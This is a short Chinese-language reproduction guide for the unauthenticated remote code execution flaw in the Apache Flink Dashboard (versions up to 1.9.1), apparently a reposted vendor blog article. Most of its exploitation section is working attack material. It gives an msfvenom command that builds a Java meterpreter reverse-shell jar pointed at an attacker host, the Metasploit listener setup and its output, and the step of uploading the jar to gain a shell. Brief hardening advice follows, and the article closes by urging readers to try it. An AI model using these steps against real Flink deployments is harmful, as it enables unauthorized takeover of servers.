Apache Flink未授权访问-远程代码命令执行漏洞复现
Apache Flink Dashboard默认没有用户权限认证。攻击者可以通过未授权的Flink Dashboard控制台,直接上传木马jar包,可远程执行任意系统命令获取服务器权限,风险极大。
二、影响版本
Apache Flink <= 1.9.1(最新版本)
三、漏洞复现
1、生成反弹jar包
msfvenom-p java/meterpreter/reverse_tcp LHOST=XX.XX.XX.XX LPORT=4444-f jar > rce.jar
2、msf设置监听
msf5> use exploit/multi/handler [*]Using configured payload generic/shell_reverse_tcpmsf5exploit(multi/handler) > set payload java/shell/reverse_tcp payload=> java/shell/reverse_tcpmsf5exploit(multi/handler) > show options Moduleoptions (exploit/multi/handler):NameCurrent Setting Required Description——————- ——– ———–Payloadoptions (java/shell/reverse_tcp):NameCurrent Setting Required Description——————- ——– ———–LHOSTyes The listen address (an interface may be specified)LPORT4444 yes The listen portExploittarget:IdName——0Wildcard Targetmsf5exploit(multi/handler) > set LHOST XX.XX.XX.XXLHOST=> XX.XX.XX.XXmsf5exploit(multi/handler) > exploit [*]Started reverse TCP handler on XX.XX.XX.XX:4444
3、上传 Jar包,并且提交
监听接受反弹的shell,获取权限
四、安全建议
1. 请关注Apache Flink官方以便获取更新信息:https://flink.apache.org/
2.针对ApacheFlinkDashboard设置防火墙策略(禁止Dashboard对外访问,或者确保只对可信端点开放), 仅允许白名单IP进行访问,并在Web代理中增加对该服务的Digest认证,防止未授权访问。
感谢你的阅读,相信你对“Apache Flink未授权访问远程代码命令执行的复现”这一问题有一定的了解,快去动手实践吧,如果想了解更多相关知识点,可以关注亿速云网站!小编会继续为大家带来更好的文章!
文章标题:Apache Flink未授权访问远程代码命令执行的复现,发布者:亿速云,转载请注明出处:https://worktile.com/kb/p/24212